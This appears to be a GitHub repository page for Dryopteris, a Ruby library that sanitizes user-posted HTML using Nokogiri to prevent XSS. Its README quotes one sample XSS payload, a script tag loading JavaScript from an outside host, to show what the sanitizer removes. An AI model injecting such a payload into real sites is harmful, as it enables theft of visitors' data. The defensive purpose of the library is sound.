queso / dryopteris forked from brynary/dryopteris

HTML sanitization using Nokogiri

This URL has Read+Write access

name age
history
message
file .gitignore Thu Dec 04 09:41:51 -0800 2008 initial whitelist lifted from html5. [flavorjones]
file README.markdown Loading commit data...
file Rakefile
directory lib/
directory test/
README.markdown

Dryopteris

Dryopteris erythrosora is the Japanese Shield Fern. It also can be used to sanitize HTML to help prevent XSS attacks.

Usage

Let's say you run a web site, and you allow people to post HTML snippets.

Let's also say some script-kiddie from Norland posts this to your site, in an effort to swipe some credit cards:

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

Oooh, that could be bad. Here's how to fix it:

safe_html_snippet = Dryopteris.sanitize(dangerous_html_snippet)

Yeah, it's that easy.

Standing on the Shoulder of Giants

Dryopteris uses Nokogiri and libxml2, so it's fast.

Dryopteris also takes its tag and tag attribute whitelists and its CSS sanitizer directly from HTML5.